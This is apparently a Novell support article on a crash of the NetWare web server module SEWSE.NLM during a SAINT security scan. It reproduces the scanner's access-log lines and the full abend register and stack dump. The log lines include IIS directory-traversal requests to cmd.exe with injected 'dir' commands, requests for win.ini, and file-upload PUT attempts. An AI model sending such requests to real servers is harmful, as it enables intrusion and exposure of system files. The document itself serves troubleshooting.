207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /scripts/Admin.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /msadc/Admin.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /scripts/Httpodbc.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /msadc/Httpodbc.dll HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /scripts/..%c1%1c../..%c1%1c../mssql7/install/pubtext.bat"+&+dir+c:+.exe HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:39:14 -0400] "GET /."./."./winnt/win.ini%20.php3 HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "POST /cgi-bin/search.pl HTTP/1.0" 502 2250
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET /.nsf/../winnt/win.ini HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET /statrep.nsf/ HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET /statrep.nsf//8F6?OpenDocument HTTP/1.0" 404 359
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET /show_bug.cgi HTTP/1.0" 500 460
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:26 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:27 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:27 -0400] "GET / HTTP/1.0" 200 655
207.30.171.18 - - [14/Jun/2002:17:39:40 -0400] "GET /AspUpload/Test11.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:42 -0400] "GET /shop/product.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:43 -0400] "GET /site/eg/source.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:44 -0400] "GET /query.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:45 -0400] "GET /search/query.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:46 -0400] "GET /advwebadmin/folders/filemanager.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:47 -0400] "GET /msadc/samples/selector/showcode.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:47 -0400] "GET /iissamples/exair/howitworks/code.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:47 -0400] "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:39:47 -0400] "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0" 200 181
207.30.171.18 - - [14/Jun/2002:17:40:48 -0400] "PUT /saint.txt HTTP/1.0" 403 840
207.30.171.18 - - [14/Jun/2002:17:41:00 -0400] "PUT /cgi-bin/saint.txt HTTP/1.0" 403 840
207.30.171.18 - - [14/Jun/2002:17:41:13 -0400] "GET /global.asp\ HTTP/1.0" 404 359

.

*********************************************************

Server INTERNET halted Friday, June 14, 2002   5:42:28 pm
Abend 1 on P00: Server-5.00k: Page Fault Processor Exception (Error code 00000000)

Registers:
    CS = 0008 DS = 005B ES = 005B FS = 005B GS = 005B SS = 0010
    EAX = FA988074 EBX = C8C45DDC ECX = 00000004 EDX = 00000074
    ESI = C8C4859C EDI = CB992FD4 EBP = CB992864 ESP = CB992854
    EIP = C39B80AE FLAGS = 00010286
    C39B80AE FF30           PUSH    dword ptr [EAX]=?
    EIP in SEWSE.NLM at code start +000030AEh
    Access Location: 0xFA988074

The violation occurred while processing the following instruction:
C39B80AE FF30           PUSH    dword ptr [EAX]
C39B80B0 FF751C         PUSH    dword ptr [EBP+1C]
C39B80B3 E868303C13     CALL    NLMLIB.NLM|NWstrncpy
C39B80B8 83C40C         ADD     ESP,0000000C
C39B80BB C745F401000000 MOV     [EBP-0C],00000001
C39B80C2 8B45F4         MOV     EAX,[EBP-0C]
C39B80C5 89EC           MOV     ESP,EBP
C39B80C7 5D             POP     EBP
C39B80C8 5F             POP     EDI
C39B80C9 5E             POP     ESI

 

Running process: Httpd 106:SEWSE Process
Created by: NetWare Application
Thread Owned by NLM: NSHTTPD.NLM
Stack pointer: CB9926F4
OS Stack limit: CB983160
Scheduling priority: 67371008
Wait state: 5050080  (Wait on an OLD Semaphore)
Stack: --000003ED  ?
       C39DC7FE  ?
       --C2D17220  ?
       --0000001D  ?
       --CB9928B4  ?
       --CB992FD4  ?
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
       -C8C45DDC  (NSHTTPD.NLM|__nsacl_table+3174)
       C39DC530  ?
       --C90C3F20  ?
       --000000C9  ?
       --CEF266B3  ?
       --000003ED  ?
       --00000000  ?
       -C3A0B5F4  (SEWSE.NLM|(Data Start)+5F4)
       --00000000  ?
       --00000005  ?
       --CEF266A0  ?
       --CEF266B3  ?
       -C3A0B5FA  (SEWSE.NLM|(Data Start)+5FA)
       -C3A0B5FA  (SEWSE.NLM|(Data Start)+5FA)
       --0000000D  ?
       --000000C9  ?
       --C3A4880E  ?
       --CB9928D4  ?
       --CB992FD4  ?
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
       -C8C45DDC  (NSHTTPD.NLM|__nsacl_table+3174)
       C39B885D  (SEWSE.NLM|(Code Start)+385D)
       --C90C3F20  ?
       -C3A0B5E7  (SEWSE.NLM|(Data Start)+5E7)
       -C8C45DDC  (NSHTTPD.NLM|__nsacl_table+3174)
       --CB992B14  ?
       --CB992FD4  ?
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
       -C8C45DDC  (NSHTTPD.NLM|__nsacl_table+3174)
       C39B71D3  (SEWSE.NLM|(Code Start)+21D3)
       --C90C3F20  ?
       --00000007  ?
       --C3A7B180  ?
       -C3A12B65  (SEWSE.NLM|(Data Start)+7B65)
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
       --0000000B  ?
       D6C21C16  (THREADS.NLM|realloc+4A)
       --C3A7B140  ?
       --C8230B44  ?
       --CB992934  ?
       --CB992FD4  ?
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
       --0000000A  ?
       --00000001  ?
       --C3A7B145  ?
       D6D7B1DE  (NLMLIB.NLM|NWstrncpy+BE)
       --C3A7B145  ?
       --CB992950  ?
       --00000001  ?
       --CB992FD4  ?
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
       --C3A91580  ?
       C39F8490  ?
       --C3A7B145  ?
       --00000246  ?
       FC01DF95  (SERVER.NLM|FreeMemoryDefault+D5)
       --C8230B44  ?
       --00000246  ?
       --00000038  ?
       --CB992FD4  ?
       --00000038  ?
       --C3A91538  ?
       --CB992A24  ?
       FC01DE4A  (SERVER.NLM|Free+122)
       --C3A91538  ?
       --CB9929C4  ?
       --CB992FD4  ?
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
       --C3A91580  ?
       C39F1F1C  ?
       --C90C3F20  ?
       --C3A4DCBA  ?
       --00000000  ?
       --00000005  ?
       --00000000  ?
       --00000246  ?
       FC01D561  (SERVER.NLM|AllocMemoryDefault+A5)
       --C8230B44  ?
       --00000246  ?
       --00000246  ?
       --CB9929DC  ?
       -FC4ED094  (SERVER.NLM|AllocSizeTable+C)
       --C3A915F8  ?
       --00000246  ?
       FC01D561  (SERVER.NLM|AllocMemoryDefault+A5)
       --C8230B44  ?
       --00000246  ?
       --00000246  ?
       --C3A91619  ?
       -FC4ED094  (SERVER.NLM|AllocSizeTable+C)
       --C3A91638  ?
       --00000000  ?
       -C8C4859C  (NSHTTPD.NLM|__nsacl_table+5934)
      
Additional Information:
    The CPU encountered a problem executing code in SEWSE.NLM.  The problem may be in that module or in data passed to that module by a process owned by NSHTTPD.NLM.

.

document

Document Title:	Saint attack causes abend in SEWSE.NLM
Document ID:	10071961
Solution ID:	NOVL80500
Creation Date:	16Jun2002
Modified Date:	12Sep2002
Novell Product Class:	Web Services

disclaimer

The Origin of this information may be internal or external to Novell. Novell makes all reasonable efforts to verify this information. However, the information provided in this document is for your information only. Novell makes no explicit or implied claims to the validity of this information.
Any trademarks referenced in this document are the property of their respective owners. Consult your product manuals for complete trademark information.